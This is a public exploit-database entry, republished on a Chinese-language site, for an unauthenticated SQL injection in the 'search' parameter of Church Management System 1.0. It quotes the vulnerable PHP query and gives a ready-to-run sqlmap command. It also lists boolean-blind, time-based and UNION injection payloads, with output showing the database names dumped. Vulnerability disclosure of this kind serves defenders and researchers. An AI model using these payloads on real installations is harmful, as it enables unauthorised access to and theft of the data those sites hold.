Church Management System 1.0 – ‘search’ SQL Injection (Unauthenticated)

• Exploit Database
• 13 阅读

• 作者： Erwin Krazek
  日期： 2021-09-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50303/

• # Exploit Title: Church Management System 1.0 - 'search' SQL Injection (Unauthenticated)
  # Exploit Author: Erwin Krazek (Nero)
  # Date: 17/09/2021
  # Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html
  # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip
  # Vendor: oretnom23
  # Version: v1.0
  # Tested on: Linux, Apache, Mysql
  # Exploit Description:
  Church Management System 1.0 suffers from an unauthenticated SQL Injection Vulnerability in 'search' parameter allowing remote attackers to dump the SQL database using SQL Injection attack.
  
  # Vulnerable Code
  In search.php on line 28
  $count_all = $conn->query("SELECT b.*,concat(u.firstname,' ',u.lastname) as author FROM `blogs` b inner join `users` u on b.author_id = u.id where b.`status` =1 and (b.`title` LIKE '%{$_GET['search']}%' OR b.`meta_description` LIKE '%{$_GET['search']}%' OR b.`keywords` LIKE '%{$_GET['search']}%' OR b.`content` LIKE '%{$_GET['search']}%' )")->num_rows;
  
  Sqlmap command:
  sqlmap -u 'http://localhost/church_management/?p=search&search=abcsw' -p search --level=5 --risk=3 --dbs --random-agent --eta --batch
  
  Output:
  ---
  Parameter: search (GET)
  Type: boolean-based blind
  Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
  Payload: p=search&search=abcsw') OR NOT 4306=4306-- rFTu
  
  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: p=search&search=abcsw') AND (SELECT 7513 FROM (SELECT(SLEEP(5)))SsaK)-- zpac
  
  Type: UNION query
  Title: Generic UNION query (NULL) - 14 columns
  Payload: p=search&search=abcsw') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766a7671,0x456e6d5461414774466e62636744424f786d74596e6270647a7063425669697970744a5351707970,0x7178787671),NULL,NULL,NULL,NULL-- -
  ---
  [17:33:38] [INFO] the back-end DBMS is MySQL
  web server operating system: Linux Debian
  web application technology: Apache 2.4.46, PHP
  back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
  [17:33:38] [INFO] fetching database names
  available databases [4]:
  [*] church_db
  [*] information_schema
  [*] mysql
  [*] performance_schema